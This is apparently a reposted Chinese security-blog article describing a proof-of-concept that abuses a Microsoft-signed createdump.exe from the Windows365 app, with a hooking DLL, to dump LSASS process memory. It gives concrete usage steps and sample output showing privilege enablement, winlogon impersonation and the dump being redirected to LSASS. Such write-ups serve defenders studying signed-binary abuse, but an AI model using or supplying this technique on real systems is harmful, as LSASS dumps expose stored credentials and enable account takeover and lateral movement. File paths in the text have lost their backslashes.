该项目演示了如何使用createdump.exe工具(Microsoft 签名的可执行文件)从 Windows 应用程序中转储 LSASS 进程,利用自定义挂钩来启用进程访问LSASS。
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnccreatedump.exe')
Directory: C:Program FilesWindowsAppsMicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwewnc
SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe
如何使用
-
将 createdump 从 WindowsApp 文件夹复制到所选文件夹 ( copy C:Program FilesWindowsAppsMicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwewnccreatedump.exe .)
-
dbgcore.dll将此 repo放置在同一个文件夹中
-
执行 createdump (可选择提供参数)
注意:需要管理员权限。
输出应该是这样的:
c:work_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump
Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:UsersmeAppDataLocalTempdump.35828.dmp
MiniDumpWriteDump called with:
ProcessId: 35828
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:WindowsSystem32DbgCore.dll
Calling original with:
ProcessId: 1512
hProcess: 0x0000000000000184
hFile: 0x00000000000001BC
DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.
项目地址:
https://github.com/rweijnen/createdump
原文始发于微信公众号(Ots安全):利用 WindowsApp createdump 工具获取 lsass 转储
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论